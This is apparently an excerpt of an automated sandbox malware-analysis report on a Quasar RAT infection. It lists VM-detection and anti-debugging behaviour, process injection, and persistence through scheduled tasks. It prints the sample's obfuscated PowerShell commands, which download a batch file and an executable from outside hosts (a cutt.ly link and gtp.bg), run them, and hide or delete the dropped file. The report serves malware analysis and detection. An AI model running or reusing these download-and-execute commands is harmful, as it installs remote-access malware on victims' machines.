Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match File source: 0000001F.00000002.2281214797.0000000002131000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2214696760.0000000002B4B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2383386591.0000000002191000.00000004.00000001.sdmp, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BIOS
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FF00280EFC sldt word ptr [eax] 7_2_000007FF00280EFC
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\sp.exe Window / User API: threadDelayed 3171 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Window / User API: threadDelayed 9387
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2112 Thread sleep time: -31500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1108 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2312 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2312 Thread sleep time: -430000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1072 Thread sleep count: 3171 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1072 Thread sleep time: -31710s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2900 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2860 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2948 Thread sleep count: 254 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1872 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 1316 Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 3068 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 820 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 3028 Thread sleep time: -420000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 2172 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 2172 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 912 Thread sleep count: 9387 > 30
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 912 Thread sleep count: 249 > 30
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 648 Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 2040 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 2128 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\sp.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Roaming\sp.exe Thread sleep count: Count: 3171 delay: -10 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError, 28_2_00426F7A
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_005C7F30 FindFirstFileW,GetLastError, 28_2_005C7F30
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo, 28_2_0044A238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000 28_2_00478772
Hides threads from debuggers
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0058E501 IsDebuggerPresent,OutputDebugStringW, 28_2_0058E501
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 28_2_004F2AA7
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0069B53C mov eax, dword ptr fs:[00000030h] 28_2_0069B53C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004AABEB GetProcessHeap,HeapFree, 28_2_004AABEB
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_006814DA
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_0068B781
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???uf871???????????ufffd??ufffd?.cs Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???ua8fa?uf866???ufffd???u323bu1377???u24a3?.cs Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\sp.exe Memory written: C:\Users\user\AppData\Roaming\sp.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory written: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Memory written: unknown base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Roaming\sp.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown

Language, Device and Operating System Detection:

Yara detected Obfuscated Powershell
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\Documents\pd.bat, type: DROPPED
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0040EA7D cpuid 28_2_0040EA7D
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: GetLocaleInfoW, 28_2_0058E1F1
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: ___crtGetLocaleInfoEx, 28_2_0058E2F3
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Queries volume information: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Queries volume information: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006A23D1 GetSystemTimeAsFileTime, 28_2_006A23D1
Source: C:\Users\user\AppData\Roaming\sp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected Quasar RAT
Source: Yara match File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
Searches for user specific document files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\attrib.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\attrib.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\user\Documents Jump to behavior

Remote Access Functionality:

Yara detected Quasar RAT
Source: Yara match File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
